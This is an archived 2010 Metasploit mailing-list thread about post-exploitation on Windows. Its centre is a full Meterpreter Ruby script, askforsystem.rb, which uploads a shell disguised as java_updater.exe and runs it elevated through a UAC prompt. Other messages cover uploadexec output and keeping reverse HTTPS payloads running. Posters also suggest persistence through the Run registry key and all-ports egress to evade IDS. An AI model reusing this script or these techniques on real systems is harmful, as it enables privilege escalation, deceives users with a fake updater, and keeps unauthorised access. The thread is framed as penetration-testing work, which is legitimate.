[prev in list] [next in list] [prev in thread] [next in thread]
List: metasploit-framework
Subject: Re: [framework] uploadexec and kitrap0d
From: Carlos Perez <carlos_perez () darkoperator ! com>
Date: 2010-07-12 18:26:10
Message-ID: 6D9F2B37-A7FA-4ADB-BE6F-0C5227E0A4D4 () darkoperator ! com
[Download RAW message or body]
[Attachment #2 (--Apple-Mail-24-4265224)]
Here is the mixin
http://www.metasploit.com/redmine/projects/framework/repository/show/lib/msf/scripts
Here is the common calls
http://www.metasploit.com/redmine/projects/framework/repository/entry/lib/msf/scripts/meterpreter/common.rb
The call would be is_uac_enabled?
Here is where I mention we can put what you are working on with railgun
Sent from my iPhone
On Jul 12, 2010, at 1:08 PM, Rob Fuller <mubix@room362.com> wrote:
> Thats a pretty pimp script. Carlos? Some of the UAC checks would also be handy in \
> other scripts as well.
> Nice work Devin!
>
> --
> Rob Fuller | Mubix
> Room362.com | Hak5.org
>
>
> On Sun, Jul 11, 2010 at 2:15 PM, Devin Kinch <devinkinch@gmail.com> wrote:
>
> Kitrap0d never works in the wild, in my experience (too old now). If you're into \
> social engineering and the rules of engagement permit it, I wrote a cheap hack \
> called askforsystem.rb. Essentially, copies over a couple files from the "Elevate" \
> Windows power tool, and a new shell. It then executes the new shell with high IL \
> privileges (which prompts the user with UAC). I chose the name java_updater.exe \
> for the new shell. It's cheap, but it works more often than not.
> To use, copy all the files from the elevate power tool to your msf data directory \
> (extract the archive first): \
> http://technet.microsoft.com/en-us/magazine/2007.06.utilityspotlight.aspx
> Then copy a meterpreter shell executable named shell.exe into your msf data \
> directory. The name is hard-coded right now. Sorry.
> Then save the following script to your meterpreter scripts directory as \
> askforsystem.rb:
> ----- cut -----
> ######################################################
> # AskForSystem: Bypass UAC by, well, asking for it #
> ######################################################
> session = client
> host,port = session.tunnel_peer.split(':')
>
> def uaccheck(session)
> uac = false
> winversion = session.sys.config.sysinfo
> if winversion['OS']=~ /(Vista|7)/
> if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM"
> print_status("Checking if UAC is enabled ...")
> key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'
> root_key, base_key = session.sys.registry.splitkey(key)
> value = "EnableLUA"
> open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ)
> v = open_key.query_value(value)
> if v.data == 1
> print_status("\tUAC is Enabled")
> uac = true
> else
> print_status("\tUAC is Disabled")
> end
> end
> end
> return uac
> end
>
> def upload(session,file,fileontrgt)
> location = session.fs.file.expand_path("%TEMP%")
> fileontrgt = "#{location}\\" + fileontrgt
> print_status("Uploading File #{file} ...")
> session.fs.file.upload_file("#{fileontrgt}","#{file}")
> print_status("Upload Complete ...")
> return fileontrgt
> end
>
> def execute_as_system(session,file)
> location = session.fs.file.expand_path("%TEMP%")
> print_status("Running Commands ...")
> session.sys.process.execute("cmd /c #{location}\\elevate #{location}\\#{file}", \
> nil,{'Hidden' => true,'Channelized' => false}) end
>
> if not uaccheck(session) then
> print_status("UAC isn't running, don't bother...")
> raise Rex::Script::Completed
> end
>
> elevatecmd = File.join(Msf::Config.install_root, "data", "elevate.cmd")
> elevatevbs = File.join(Msf::Config.install_root, "data", "elevate.vbs")
> shell = File.join(Msf::Config.install_root, "data", "shell.exe")
>
> upload(session,elevatecmd,"elevate.cmd")
> upload(session,elevatevbs,"elevate.vbs")
> upload(session,shell,"java_updater.exe")
>
> sleep 1
>
> print_status("Executing shell as system...")
> execute_as_system(session,"java_updater.exe")
> ----cut----
>
> My ruby sucks, but you get the idea. If someone wants to take the above script and \
> add the appropriate railgun calls to ShellExecuteEx with the runas verb, be my \
> guest. Also keep in mind that UAC isn't that big of an obstacle to Pen Testing... \
> you can still read all of the users data. You can also still write to several \
> directories in their profile (AppData is shown as the target above). You can also \
> make meterpreter persistent by writing to the \
> HKCU\software\microsoft\windows\currentversion\run key. But no hashes :(
> Invisible things lab blog has a great writeup of UAC here: \
> http://theinvisiblethings.blogspot.com/2007/02/running-vista-every-day.html \
> Especially relevant is the criticism that it doesn't protect any user data, it just \
> prevents machines from being malware infested bots.
> Devin
>
>
>
>
> On Sat, Jul 10, 2010 at 6:58 AM, Miguel Rios <miguelrios35@yahoo.com> wrote:
> Just tried it. Working like a charm now. Uploaded and executed without a problem.
> I should be the one thanking you for sharing so much of your knowledge. Your \
> scripts rock and I have learned tons from reading you over the years.
> I also noticed the kitrap0d script didn't work on the win 7 machine, probably all \
> patched by now. I know that getprivs has gone through some changes so what's the \
> best script to run right off the bat when you have meterpreter running as \
> non-privileged user, before running scraper, hashdump and the like?
>
> cheers
> --- On Sat, 7/10/10, Carlos Perez <carlos_perez@darkoperator.com> wrote:
>
> From: Carlos Perez <carlos_perez@darkoperator.com>
> Subject: Re: [framework] Meterpreter unexpectedly closes
> To: "Miguel Rios" <miguelrios35@yahoo.com>
> Cc: framework@spool.metasploit.com
> Date: Saturday, July 10, 2010, 1:45 PM
>
> svn up and give it a try now, it should be fixed. Thanks for reporting it
>
> On Jul 10, 2010, at 9:21 AM, Miguel Rios wrote:
>
> > Thanks Carlos.
> > Here's the output: running against a win 7 7600 build (english) machine.
> >
> > meterpreter > run uploadexec -e /root/notepad.exe
> > [*] Running Upload and Execute Meterpreter script....
> > [*] Uploading /root/notepad.exe....
> > [*] /root/notepad.exe uploaded!
> > [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP42.exe
> > [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
> > meterpreter > run uploadexec -e /root/notepad.exe -o /Q
> > [*] Running Upload and Execute Meterpreter script....
> > [*] Uploading /root/notepad.exe....
> > [*] /root/notepad.exe uploaded!
> > [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP41.exe
> > [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
> > meterpreter > run uploadexec -e /root/notepad.exe -v
> > [*] Running Upload and Execute Meterpreter script....
> > [*] Uploading /root/notepad.exe....
> > [*] /root/notepad.exe uploaded!
> > [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP45.exe
> > [-] Error in script: ArgumentError wrong number of arguments (4 for 1)
> > meterpreter >
> >
> > --- On Sat, 7/10/10, Carlos Perez <carlos_perez@darkoperator.com> wrote:
> >
> > From: Carlos Perez <carlos_perez@darkoperator.com>
> > Subject: Re: [framework] Meterpreter unexpectedly closes
> > To: "Miguel Rios" <miguelrios35@yahoo.com>
> > Cc: "Alex Polychronopoulos" <tweakier@gmail.com>, framework@spool.metasploit.com
> > Date: Saturday, July 10, 2010, 12:49 PM
> >
> > Miguel
> >
> > Do send me the output of what your getting and the command it self and I will \
> > take a look
> > Cheers,
> > Carlos
> >
> > On Jul 10, 2010, at 8:34 AM, Miguel Rios wrote
> > > Thanks. That explains it perfectly. For some reason I thought that meterpreter \
> > > would continuously try to connect back. Now I know I was wrong. I had tried the \
> > > loop option with VBS but the problem is that my custom script is designed to \
> > > delete itself after running the meterpreter binary, so it obviously won't be \
> > > there to respawn meterpreter. A bit of a catch 22.
> > > Thinking out loud, I could either schedule it to start every x minutes (but you \
> > > need to be admin to use the 'at' and 'schtasks' I believe) or have it auto run \
> > > at startup through the registry and have a listener permanently set up on the \
> > > internet listening and ready to run a bunch of scripts like scraper, etc (by \
> > > the way, any literature out there on setting up just meterpreter listeners and \
> > > scripts on a webserver or do I have to set up the full MSF on the server?).
> > > Thanks also to 5.K1dd for responding but Alex cleared it up perfectly. It \
> > > wasn't a question of the exploited process dying since it's a standalone \
> > > meterpreter binary I'm playing with.
> > > Curious to see if there is any news or development regarding the all_ports \
> > > possibility for this payload, like with reverse_tcp. That would be super \
> > > stealth and highly effective at egressing the most restrictive networks.
> > > P.S. off topic here but I'm also having trouble with the uploadexec script. I \
> > > manage to upload my notepad.exe binary to %temp% but it doesn't execute and the \
> > > script spits out some error message about wrong count (4 of 1 or something like \
> > > that) or missing argument. Does this have something to do with the -o switch? \
> > > Is it mandatory? I just want my binary to be silently executed but I must be \
> > > missing something stupidly obvious. Time to sleep maybe.
> > > --- On Sat, 7/10/10, Alex Polychronopoulos <tweakier@gmail.com> wrote:
> > >
> > > From: Alex Polychronopoulos <tweakier@gmail.com>
> > > Subject: Re: [framework] Meterpreter unexpectedly closes
> > > To: "Miguel Rios" <miguelrios35@yahoo.com>
> > > Cc: framework@spool.metasploit.com
> > > Date: Saturday, July 10, 2010, 8:28 AM
> > >
> > > Meterpreter is designed to not persistently trying to connect back to the \
> > > handler, it tries once and then dies, so you're not doing something wrong. What \
> > > you can do here is try the msfencode -t loop_vbs option which converts the \
> > > payload into a vbscript and runs it every 5 seconds by default (you can change \
> > > this by editing the generated .vbs file).
> > > On Sat, Jul 10, 2010 at 3:33 AM, Miguel Rios <miguelrios35@yahoo.com> wrote:
> > > Hi list,
> > > I've msfencoded a meterpreter reverse https payload using a win binary as a \
> > > template. Everything seems to work fine when I test it in my XP SP3. I see the \
> > > outbound connection and the process running, but after about a minute or so the \
> > > process dies if there's no listener configured on the receiving end and doesn't \
> > > respawn. What am I doing wrong here? I must be missing something obvious. Is \
> > > there a timeout option for this reverse shell or a way to keep the process \
> > > always running, even if it can't connect to the listener? Or is this due to \
> > > msfencoding the payload somehow breaks it? I have tested that it does work \
> > > properly when the listener is waiting for it, it's just the fact it timesout so \
> > > quickly that is a pain.
> > > Also, saw the reverse_tcp allports payload and was wondering if there's a \
> > > similar one for reverse meterpreter https. Ideally one could configure default \
> > > ports to try 1st and then keep trying randomly the other 65000 or so to evade \
> > > IDS. I know this would increase the payload size but it would be pretty stealth \
> > > egress wise.
> > > Thanks. I do really love metasploit and the whole community behind it. You all \
> > > rock.
> > > Miguel
> > >
> > >
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
> > >
> > >
> > >
> > > _______________________________________________
> > > https://mail.metasploit.com/mailman/listinfo/framework
> >
> >
>
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
>
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
>
>
> _______________________________________________
> https://mail.metasploit.com/mailman/listinfo/framework
[Attachment #5 (unknown)]
<html><body bgcolor="#FFFFFF"><div>Here is the mixin</div><div><br></div><a \
href="http://www.metasploit.com/redmine/projects/framework/repository/show/lib/msf/scr \
ipts">http://www.metasploit.com/redmine/projects/framework/repository/show/lib/msf/scripts</a><div><br></div><div>Here \
is the common calls </div><div><br></div><div><br><div>http://www.metasploit.com/ \
redmine/projects/framework/repository/entry/lib/msf/scripts/meterpreter/common.rb</div><div><br></div><div>The \
call would be <span class="Apple-style-span" style="font-family: arial, \
sans-serif; -webkit-tap-highlight-color: rgba(26, 26, 26, 0.296875); \
-webkit-composition-fill-color: rgba(175, 192, 227, 0.230469); \
-webkit-composition-frame-color: rgba(77, 128, 180, 0.230469); font-size: 12px; \
border-collapse: collapse; color: rgb(51, 51, 51); -webkit-border-horizontal-spacing: \
2px; -webkit-border-vertical-spacing: 2px; "><span class="Apple-style-span" \
style="font-family: monospace; white-space: pre-wrap; "><span class="fu" \
style="color: rgb(0, 102, 187); font-weight: bold; \
">is_uac_enabled?</span></span></span></div><div><span class="Apple-style-span" \
style="font-family: arial, sans-serif; -webkit-tap-highlight-color: rgba(26, 26, 26, \
0.296875); -webkit-composition-fill-color: rgba(175, 192, 227, 0.230469); \
-webkit-composition-frame-color: rgba(77, 128, 180, 0.230469); font-size: 12px; \
border-collapse: collapse; color: rgb(51, 51, 51); -webkit-border-horizontal-spacing: \
2px; -webkit-border-vertical-spacing: 2px; "><span class="Apple-style-span" \
style="font-family: monospace; white-space: pre-wrap; "><span class="fu" \
style="color: rgb(0, 102, 187); font-weight: bold; "></span></span><pre \
style="margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; \
white-space: pre-wrap; "> </pre><pre style="margin-top: 0px; margin-right: 0px; \
margin-bottom: 0px; margin-left: 0px; white-space: pre-wrap; ">Here is where I \
mention we can put what you are working on with railgun</pre></span><br><br>Sent from \
my iPhone</div><div><br>On Jul 12, 2010, at 1:08 PM, Rob Fuller \
<mubix@room362.com> wrote:<br><br></div><div></div><blockquote \
type="cite"><div>Thats a pretty pimp script. Carlos? Some of the UAC checks would \
also be handy in other scripts as well.<div><br></div><div>Nice work Devin!<br \
clear="all"><br>--<br>Rob Fuller | Mubix <br>Room362.com | Hak5.org <br> <br><br><div \
class="gmail_quote">On Sun, Jul 11, 2010 at 2:15 PM, Devin Kinch <span \
dir="ltr"><<a href="mailto:devinkinch@gmail.com">devinkinch@gmail.com</a>></span> \
wrote:<br><blockquote class="gmail_quote" style="margin:0 0 0 .8ex;border-left:1px \
#ccc solid;padding-left:1ex;">
<br clear="all">Kitrap0d never works in the wild, in my experience (too old \
now). If you're into social engineering and the rules of engagement permit it, \
I wrote a cheap hack called askforsystem.rb. Essentially, copies over a couple \
files from the "Elevate" Windows power tool, and a new shell. It then executes \
the new shell with high IL privileges (which prompts the user with UAC). I \
chose the name java_updater.exe for the new shell. It's cheap, but it works \
more often than not.<br>
<br>To use, copy all the files from the elevate power tool to your msf data directory \
(extract the archive first):<br><a \
href="http://technet.microsoft.com/en-us/magazine/2007.06.utilityspotlight.aspx" \
target="_blank">http://technet.microsoft.com/en-us/magazine/2007.06.utilityspotlight.aspx</a><br>
<br>
Then copy a meterpreter shell executable named shell.exe into your msf data \
directory. The name is hard-coded right now. Sorry.<br><br>Then save the \
following script to your meterpreter scripts directory as askforsystem.rb:<br>
<br>----- cut -----<br>######################################################<br># \
AskForSystem: Bypass UAC by, well, asking for it \
\
#<br>######################################################<br>session = client<br>
host,port = session.tunnel_peer.split(':')<br><br>def \
uaccheck(session)<br> uac = false<br> winversion \
= session.sys.config.sysinfo<br> if winversion['OS']=~ \
/(Vista|7)/<br> if session.sys.config.getuid != \
"NT AUTHORITY\\SYSTEM"<br>
print_status("Checking if \
UAC is enabled ...")<br> key \
= 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System'<br> \
root_key, base_key = \
session.sys.registry.splitkey(key)<br>
value = \
"EnableLUA"<br> open_key = \
session.sys.registry.open_key(root_key, base_key, KEY_READ)<br> \
v = \
open_key.query_value(value)<br> \
if v.data == 1<br> \
print_status("\tUAC is Enabled")<br>
uac = \
true<br> \
else<br> \
print_status("\tUAC is Disabled")<br> \
end<br> \
end<br> end<br> return uac<br>end<br><br>def \
upload(session,file,fileontrgt)<br>
location = \
session.fs.file.expand_path("%TEMP%")<br> fileontrgt = \
"#{location}\\" + fileontrgt<br> print_status("Uploading File \
#{file} ...")<br> \
session.fs.file.upload_file("#{fileontrgt}","#{file}")<br>
print_status("Upload Complete ...")<br> return \
fileontrgt<br>end<br><br>def execute_as_system(session,file)<br> \
location = session.fs.file.expand_path("%TEMP%")<br> \
print_status("Running Commands ...")<br>
session.sys.process.execute("cmd /c #{location}\\elevate \
#{location}\\#{file}", nil,{'Hidden' => true,'Channelized' => \
false})<br>end<br><br>if not uaccheck(session) then<br> \
print_status("UAC isn't running, don't bother...")<br>
raise Rex::Script::Completed<br>end<br><br>elevatecmd = \
File.join(Msf::Config.install_root, "data", "elevate.cmd")<br>elevatevbs = \
File.join(Msf::Config.install_root, "data", "elevate.vbs")<br>
shell = File.join(Msf::Config.install_root, "data", \
"shell.exe")<br><br>upload(session,elevatecmd,"elevate.cmd")<br>upload(session,elevatevbs,"elevate.vbs")<br>upload(session,shell,"java_updater.exe")<br>
<br>sleep 1<br><br>print_status("Executing shell as \
system...")<br>execute_as_system(session,"java_updater.exe")<br>----cut----<br><br>My \
ruby sucks, but you get the idea. If someone wants to take the above script and \
add the appropriate railgun calls to ShellExecuteEx with the runas verb, be my \
guest. Also keep in mind that UAC isn't that big of an obstacle to Pen \
Testing... you can still read all of the users data. You can also still write \
to several directories in their profile (AppData is shown as the target above). \
You can also make meterpreter persistent by writing to the \
HKCU\software\microsoft\windows\currentversion\run key. But no hashes :(<br>
<br>Invisible things lab blog has a great writeup of UAC here: <a \
href="http://theinvisiblethings.blogspot.com/2007/02/running-vista-every-day.html" \
target="_blank">http://theinvisiblethings.blogspot.com/2007/02/running-vista-every-day.html</a><br>
Especially relevant is the criticism that it doesn't protect any user data, it just \
prevents machines from being malware infested bots.<br><font \
color="#888888"><br>Devin</font><div><div></div><div class="h5"><br><br>
<br><br><div class="gmail_quote">On Sat, Jul 10, 2010 at 6:58 AM, Miguel Rios <span \
dir="ltr"><<a href="mailto:miguelrios35@yahoo.com" \
target="_blank">miguelrios35@yahoo.com</a>></span> wrote:<br> <blockquote \
class="gmail_quote" style="border-left:1px solid rgb(204, 204, 204);margin:0pt 0pt \
0pt 0.8ex;padding-left:1ex"><table border="0" cellpadding="0" \
cellspacing="0"><tbody><tr><td \
style="font-family:inherit;font-style:inherit;font-variant:inherit;font-weight:inherit \
;font-size:inherit;line-height:inherit;font-size-adjust:inherit;font-stretch:inherit" \
valign="top">
Just tried it. Working like a charm now. Uploaded and executed without a \
problem.<br>I should be the one thanking you for sharing so much of your knowledge. \
Your scripts rock and I have learned tons from reading you over the years.<br>
<br>I also noticed the kitrap0d script didn't work on the win 7 machine, probably all \
patched by now. I know that getprivs has gone through some changes so what's the best \
script to run right off the bat when you have meterpreter running as non-privileged \
user, before running scraper, hashdump and the like?<br>
<br><br>cheers<br>--- On <b>Sat, 7/10/10, Carlos Perez <i><<a \
href="mailto:carlos_perez@darkoperator.com" \
target="_blank">carlos_perez@darkoperator.com</a>></i></b> wrote:<br><blockquote \
style="border-left:2px solid rgb(16, 16, 255);margin-left:5px;padding-left:5px">
<br>From: Carlos Perez <<a href="mailto:carlos_perez@darkoperator.com" \
target="_blank">carlos_perez@darkoperator.com</a>><br>Subject: Re: [framework] \
Meterpreter unexpectedly closes<br>To: "Miguel Rios" <<a \
href="mailto:miguelrios35@yahoo.com" \
target="_blank">miguelrios35@yahoo.com</a>><br>Cc: <a \
href="mailto:framework@spool.metasploit.com" \
target="_blank">framework@spool.metasploit.com</a><br>
Date: Saturday, July 10, 2010, 1:45 PM<br><br><div>svn up and give it a try now, it \
should be fixed. Thanks for reporting it<div><br><div><div>On Jul 10, 2010, at 9:21 \
AM, Miguel Rios wrote:</div><br><blockquote type="cite">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td \
style="font-family:inherit;font-style:inherit;font-variant:inherit;font-weight:inherit \
;font-size:inherit;line-height:inherit;font-size-adjust:inherit;font-stretch:inherit" \
valign="top">
Thanks Carlos.<br>Here's the output: running against a win 7 7600 build (english) \
machine.<br><br>meterpreter > run uploadexec -e /root/notepad.exe<br>[*] Running \
Upload and Execute Meterpreter script....<br>[*] Uploading \
/root/notepad.exe....<br>
[*]
/root/notepad.exe uploaded!<br>[*] Uploaded as \
C:\Users\xx\AppData\Local\Temp\TMP42.exe<br>[-] Error in script: ArgumentError wrong \
number of arguments (4 for 1)<br>meterpreter > run uploadexec -e /root/notepad.exe \
-o /Q<br>
[*] Running Upload and Execute Meterpreter script....<br>[*] \
Uploading /root/notepad.exe....<br>[*] /root/notepad.exe \
uploaded!<br>[*] Uploaded as \
C:\Users\xx\AppData\Local\Temp\TMP41.exe<br>[-] Error in script: ArgumentError wrong \
number of arguments (4 for 1)<br>meterpreter > run uploadexec -e \
/root/notepad.exe -v<br>[*] Running Upload and Execute Meterpreter \
script....<br>[*] Uploading \
/root/notepad.exe....<br>[*] /root/notepad.exe uploaded!<br>
[*] Uploaded as \
C:\Users\xx\AppData\Local\Temp\TMP45.exe<br>[-] Error in script: ArgumentError wrong \
number of arguments (4 for 1)<br>meterpreter \
> <br><br>--- On \
<b>Sat, 7/10/10, Carlos Perez <i><<a rel="nofollow" \
href="http://mc/compose?to=carlos_perez@darkoperator.com" \
target="_blank">carlos_perez@darkoperator.com</a>></i></b> wrote:<br>
<blockquote style="border-left:2px solid rgb(16, 16, \
255);margin-left:5px;padding-left:5px"><br>From: Carlos Perez <<a rel="nofollow" \
href="http://mc/compose?to=carlos_perez@darkoperator.com" \
target="_blank">carlos_perez@darkoperator.com</a>><br>
Subject: Re: [framework] Meterpreter unexpectedly closes<br>To: "Miguel Rios" <<a \
rel="nofollow" href="http://mc/compose?to=miguelrios35@yahoo.com" \
target="_blank">miguelrios35@yahoo.com</a>><br>Cc: "Alex Polychronopoulos" <<a \
rel="nofollow" href="http://mc/compose?to=tweakier@gmail.com" \
target="_blank">tweakier@gmail.com</a>>, <a rel="nofollow" \
href="http://mc/compose?to=framework@spool.metasploit.com" \
target="_blank">framework@spool.metasploit.com</a><br>Date: Saturday, July 10, 2010, \
12:49 PM<br><br><div>Miguel <div><br></div><div>Do send me the output of what \
your getting and the command it self and I will take a look</div>
<div><br></div><div>Cheers,</div><div>Carlos</div><div><br><div><div>On Jul 10, 2010, \
at 8:34 AM, Miguel Rios wrote</div><blockquote type="cite"><table border="0" \
cellpadding="0" cellspacing="0"><tbody><tr><td \
style="font-family:inherit;font-style:inherit;font-variant:inherit;font-weight:inherit \
;font-size:inherit;line-height:inherit;font-size-adjust:inherit;font-stretch:inherit" \
valign="top">
Thanks. That explains it perfectly. For some reason I thought that meterpreter would \
continuously try to connect back. Now I know I was wrong. I had tried the loop option \
with VBS but the problem is that my custom script is designed to delete itself after \
running the meterpreter binary, so it obviously won't be there to respawn \
meterpreter. A bit of a catch 22. <br><br>Thinking out loud, I could either schedule \
it to start every x minutes (but you need to be admin to use the 'at' and 'schtasks' \
I believe) or have it auto run at startup through the registry and have a listener \
permanently set up on the internet listening and ready to run a bunch of scripts like \
scraper, etc (by the way, any literature out there on setting up just meterpreter \
listeners and scripts on a webserver or do I have to set up the full MSF on the \
server?).<br>
<br>Thanks also to <span>5.K1dd for responding but Alex cleared it up perfectly. It \
wasn't a question of the exploited process dying since it's a standalone meterpreter \
binary I'm playing with.<br><br>Curious to see if there is any news or development \
regarding the all_ports possibility for this payload, like with reverse_tcp. That \
would be super stealth and highly effective at egressing the most restrictive \
networks.<br><br>P.S. off topic here but I'm also having trouble with the uploadexec \
script. I manage to upload my notepad.exe binary to %temp% but it doesn't execute and \
the script spits out some error message about wrong count (4 of 1 or something like \
that) or missing argument. Does this have something to do with the -o switch? Is it \
mandatory? I just want my binary to be silently executed but I must be missing \
something stupidly obvious. Time to sleep maybe.<br>
</span><br>--- On <b>Sat, 7/10/10, Alex Polychronopoulos <i><<a \
rel="nofollow">tweakier@gmail.com</a>></i></b> wrote:<br><blockquote \
style="border-left:2px solid rgb(16, 16, \
255);margin-left:5px;padding-left:5px"><br>From: Alex Polychronopoulos <<a \
rel="nofollow">tweakier@gmail.com</a>><br>Subject: Re: [framework] Meterpreter \
unexpectedly closes<br>
To: "Miguel Rios" <<a rel="nofollow">miguelrios35@yahoo.com</a>><br>Cc: <a \
rel="nofollow">framework@spool.metasploit.com</a><br>Date: Saturday, July 10, 2010, \
8:28 AM<br><br><div>Meterpreter is designed to not persistently trying to connect \
back to the handler, it tries once and then dies, so you're not doing something \
wrong. What you can do here is try the msfencode -t loop_vbs option which converts \
the payload into a vbscript and runs it every 5 seconds by default (you can change \
this by editing the generated .vbs file).<br> <br><div class="gmail_quote">On Sat, \
Jul 10, 2010 at 3:33 AM, Miguel Rios <span dir="ltr"><<a \
rel="nofollow">miguelrios35@yahoo.com</a>></span> wrote:<br><blockquote \
class="gmail_quote" style="border-left:1px solid rgb(204, 204, 204);margin:0pt 0pt \
0pt 0.8ex;padding-left:1ex">
<table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td \
style="font-family:inherit;font-style:inherit;font-variant:inherit;font-weight:inherit \
;font-size:inherit;line-height:inherit;font-size-adjust:inherit;font-stretch:inherit" \
valign="top">
Hi list,<br>I've msfencoded a meterpreter reverse https payload using a win binary as \
a template. Everything seems to work fine when I test it in my <span>XP SP3</span>. I \
see the outbound connection and the process running, but after about a minute or so \
the process dies if there's no listener configured on the receiving end and doesn't \
respawn.<br>What am I doing wrong here? I must be missing something obvious. Is there \
a timeout option for this reverse shell or a way to keep the process always running, \
even if it can't connect to the listener? Or is this due to msfencoding the
payload somehow breaks it? I have tested that it does work properly when the listener \
is waiting for it, it's just the fact it timesout so quickly that is a \
pain.<br><br>Also, saw the reverse_tcp allports payload and was wondering if there's \
a similar one for reverse meterpreter https. Ideally one could configure default \
ports to try 1st and then keep trying randomly the other 65000 or so to evade IDS. I \
know this would increase the payload size but it would be pretty stealth egress \
wise.<br><br>Thanks. I do really love metasploit and the whole community behind it. \
You all rock.<br><br>Miguel<br></td></tr></tbody></table><br>
<br>_______________________________________________<br>
<a rel="nofollow" href="https://mail.metasploit.com/mailman/listinfo/framework" \
target="_blank">https://mail.metasploit.com/mailman/listinfo/framework</a><br> \
<br></blockquote></div><br> </div></blockquote></td></tr></tbody></table><br>
_______________________________________________<br><a rel="nofollow" \
href="https://mail.metasploit.com/mailman/listinfo/framework" \
target="_blank">https://mail.metasploit.com/mailman/listinfo/framework</a><br></blockquote>
</div><br></div></div></blockquote></td></tr></tbody></table><br>
</blockquote></div><br></div></div></blockquote></td></tr></tbody></table><br>
<br>_______________________________________________<br>
<a href="https://mail.metasploit.com/mailman/listinfo/framework" \
target="_blank">https://mail.metasploit.com/mailman/listinfo/framework</a><br> \
<br></blockquote></div><br> \
</div></div><br>_______________________________________________<br> <a \
href="https://mail.metasploit.com/mailman/listinfo/framework" \
target="_blank">https://mail.metasploit.com/mailman/listinfo/framework</a><br> \
<br></blockquote></div><br></div> </div></blockquote><blockquote \
type="cite"><div><span>_______________________________________________</span><br><span \
>https://mail.metasploit.com/mailman/listinfo/framework</span><br></div></blockquote></div></body></html>
>
_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic